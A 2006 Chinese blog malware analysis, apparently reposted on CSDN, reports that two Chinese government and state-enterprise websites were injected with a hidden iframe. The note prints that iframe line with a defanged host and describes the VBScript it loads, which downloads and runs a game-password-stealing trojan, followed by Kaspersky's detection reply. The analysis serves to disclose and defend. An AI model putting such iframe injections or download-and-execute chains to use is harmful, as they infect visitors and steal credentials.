10-01 某政府和某中央企业网站被挂的木马升级了 第2版

分享一下我老师大神的人工智能教程。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到我们人工智能的队伍中来!https://blog.csdn.net/jiangjunshow

               
endurer 原创
2006-10-01  第 2版 补充 Kaspersky的回复。
2006-09-30  第 1
 
上回发现这两个网站被挂上魔兽网游盗号木马。
 
如今网站首页被加入的代码变为:
/------------
<iframe height=0 width=0 src="hxxp://***object***.cnicb*.com/1**5"></iframe>
------------/
 
hxxp://***object***.cnicb*.com/1**5      的内容为加入多余空格的VBScript脚本代码。
该脚本代码利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://***object**.cnicb*.com/1***5/s***.exe,保存为 %temp%/test.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
test.exe             长度为 58,412 字节。                                                                       
主 题:RE: test.exe [KLAB-1256458]
  发件人:"" <newvirus@kaspersky.com>  发送时间:2006-09-30 20:52:16
  收件人:"" <endurer@163.com>

Hello, thank you, detected as Trojan-PSW.Win32.OnLineGames.m

Detection will be added to the next update.
--
Best regards, Shvetsov Dmitry
Virus analyst, Kaspersky Lab.

e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/

           

分享一下我老师大神的人工智能教程。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到我们人工智能的队伍中来!https://blog.csdn.net/jiangjunshow

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值